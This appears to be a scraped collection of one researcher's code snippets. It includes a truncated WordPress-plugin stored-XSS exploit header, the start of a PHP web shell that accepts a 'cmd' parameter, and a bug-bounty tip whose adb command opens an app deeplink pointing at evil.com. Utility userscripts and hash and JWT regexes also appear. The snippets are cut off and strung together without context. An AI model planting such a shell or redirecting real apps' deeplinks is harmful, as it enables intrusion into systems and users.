sathishshan

# General mirror

USER=""
PASSWORD=""
HOST=""
REMOTE_DIR=""
LOCAL_DIR=""

lftp -u "$USER","$PASSWORD" $HOST <<EOF
# the next 3 lines put you in ftpes mode. Uncomment if you are having trouble connecting.

sathishshan

# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
# Date: 03/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Recontre
# Software Link: https://wordpress.org/plugins/rencontre/
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps

# Description

sathishshan

# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
# Date: 04/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Recontre
# Software Link: https://wordpress.org/plugins/rencontre/
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps

# Description

sathishshan

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if($_GET['cmd'])
    {

sathishshan

https://get.google.com/albumarchive/{ID}
https://www.google.com/maps/contrib/{ID}

https://thebot.net/api/gmail/?fbclid=IwAR0nDRBMtT1yD2kDj_Jl4buKPqAeIDmuhsj7Q0dMHQXuwMI1a9twRKihKpM

e.xa.mple@gmail.com example@gmail.com

the above two mail addres is same

sathishshan

You must love #Android deeplinks! They are the easiest way to get bounties

1. Decompile an app with jadx

2. Collect all deeplink handlers from AndroidManifest.xml, they look like

3. Grep among all sources and resources a pattern from a handler, in this case, airbnb://d

4. You could find a lot of hardcoded urls like airbnb://d/openurl?url=https:// http://airbnb.com/blabla. That's much simpler than learning app's sources

5. Now try to put your own domains with adb (adb shell am start -a android.intent.action.VIEW -d airbnb://d/openurl?url=http:// http://evil.com) or on HTML pages (check out the H1 report below)

6. Repeat the same thing for iOS apps. Usually, functionality is similar, but actual implementations are different

sathishshan

// ==UserScript==
// @name           Remove-UTM-from-URL
// @namespace      parameter_blocker
// @description    Removes UTM from url (by reloading)
// @version        1.0
// @include        https://www.naukri.com/job-listings*
// @run-at document-start
// ==/UserScript==

var loc = window.top.location.toString();

sathishshan

// ==UserScript==
// @name           Remove_Params
// @namespace      parameter_blocker
// @description    Remove any parameter from the url
// @version        1.0
// @include        *
// @run-at document-start
// ==/UserScript==

var loc = window.top.location.toString();

sathishshan

Regex to match MD2, MD4, MD5, SHA224, SHA256, SHA384, SHA512 hashes in case someone needs it.

([a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?)

sathishshan

Regex to match JWTs

[= ]eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*